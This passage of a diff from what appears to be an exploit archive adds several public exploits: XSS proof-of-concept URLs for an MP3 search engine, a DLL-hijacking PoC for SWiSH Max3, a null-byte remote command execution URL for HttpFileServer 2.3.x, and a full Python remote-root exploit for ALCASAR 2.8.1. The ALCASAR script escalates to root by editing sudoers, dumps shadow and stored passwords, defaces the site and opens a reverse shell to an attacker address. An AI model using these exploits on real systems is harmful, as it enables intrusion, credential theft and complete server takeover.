An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/info.php?name="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/lyrics.php?id="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>

229
platforms/php/webapps/34666.py Executable file
View file

@ -0,0 +1,229 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
#
# Author: eF
# Date : 2014-09-12
# URL : http://www.alcasar.net/
#
# This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
#
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
# It authenticates, attributes and protects users' access regardless their connected equipment
# (PC, smartphone, game console, etc.).
#
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
#
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# A few days later, a new version corrects the vulnerability. Or maybe not...
#
# At first, this is how ALCASAR's developers present the previous vulnerability:
#
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security "
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that "
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
#
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of "retrieving a lot of data from the server".
#
# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
# one.
#
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
#
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
#
# WTF?!
# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
# only if its scheme is valid:
#
# $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
# bool(false)
# $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
# string(21) "http://www.google.com"
#
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
# Service down, vulnerability still present: double fail.
#
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
# as root.
#
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
#
# We can create a service with our command and start it as root:
#
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
#
# Conclusion: triple fail.
#
# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
# little training on secure PHP development?
#
# On ALCASAR website:
#
# "The security of the portal has been worked out like a bastion in order to resist to different
# kinds of threat"
#
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
#
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
# etc.
#
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
# patched, etc. If the elementary rules of open source development had been met, a user could have
# prevented this 2.8.1 patch from being crap.
#
#
####
import sys, os, re, httplib
class PWN_Alcasar:
def __init__(self, host):
self.host = host
self.root = False
def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
if self.root:
cmd = 'sudo %s' % cmd
wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
wrapper = wrapper.replace(' ', '${IFS}')
headers = {
'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
}
c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
c.close()
m = re.search(r'%s, (.*)\s</div>' % tag, data)
if m:
data = m.group(1).decode('base64')
if output:
print data
return data
return None
def read_file(self, filepath, output=True):
return self.exec_cmd('cat "%s"' % filepath, output=output)
def read_passwords(self):
self.read_file('/root/ALCASAR-passwords.txt')
self.read_file('/etc/shadow')
self.read_file('/usr/local/etc/digest/key_all')
self.read_file('/usr/local/etc/digest/key_admin')
self.read_file('/usr/local/etc/digest/key_backup')
self.read_file('/usr/local/etc/digest/key_manager')
self.read_file('/usr/local/etc/digest/key_only_admin')
self.read_file('/usr/local/etc/digest/key_only_backup')
self.read_file('/usr/local/etc/digest/key_only_manager')
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
if alcasar_mysql:
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
if m:
radiuspwd = m.group(1)
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
def edit_sudoers(self):
service = '[Unit]\n'
service += 'Description=Just another ALCASAR lolcalr00t\n\n'
service += '[Service]\n'
service += 'Type=forking\n'
service += 'KillMode=process\n'
service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
self.exec_cmd('sudo systemctl start Pwn3d.service')
if exploit.exec_cmd('sudo id').find('uid=0') != -1:
self.root = True
def reverse_shell(self, rip, rport='80'):
payload = 'import socket,subprocess,os;'
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
payload += 's.connect((\'%s\',%s));' % (rip, rport)
payload += 'os.dup2(s.fileno(),0);'
payload += 'os.dup2(s.fileno(),1);'
payload += 'os.dup2(s.fileno(),2);'
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
return self.exec_cmd('python -c "%s"' % payload)
def lolz(self):
old = 'http://www.wikipedia.org'
new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
def usage():
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
print ' "command" can be a shell command or "reverseshell"'
sys.exit(0)
if __name__ == '__main__':
print '#' * 80
print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
print '# Author: eF'
print '#' * 80
if len(sys.argv) < 3:
usage()
cmd = sys.argv[2]
if cmd == 'reverseshell':
if len(sys.argv) < 5:
print '[!] Need IP and port for the reverse shell...'
sys.exit(0)
rip = sys.argv[3]
rport = sys.argv[4]
exploit = PWN_Alcasar(sys.argv[1])
print '[-] whoami (should be apache):'
exploit.exec_cmd('id', output=True)
print '[+] On the way to the uid 0...'
exploit.edit_sudoers()
print '[-] Got root?'
exploit.exec_cmd('id', output=True)
exploit.lolz()
if exploit.root:
print '[+] Here are some passwords for you (again):'
exploit.read_passwords()
if cmd == 'reverseshell':
print '[+] You should now have a shell on %s:%s' % (rip, rport)
exploit.reverse_shell(rip, rport)
else:
print '[+] Your command Sir:'
exploit.exec_cmd(cmd, output=True)
sys.exit(1)

View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/43332/info
SWiSH Max3 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
SWiSH Max3 is vulnerable; other versions may also be affected.
/*
#SWiSHmax DLL Hijacking Exploit (swishmaxres.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com $ GlaDiatOr $ SILVER STAR $ Coffin Of Evil $ HoBeeZ $ Mr.Mh$TEr $ ?Own3d $ Cyber-Err0r $ Nashy $ all My Friends
#contact: D3v-PoinT@hotmail.com & C1EH@Hotmail.com
#Tested on: Windows XP sp3
#How to use : Place a .swi file and swishmaxres.dll in same folder and execute .swi file in
#swishmaxres.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

View file

@ -0,0 +1,25 @@
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.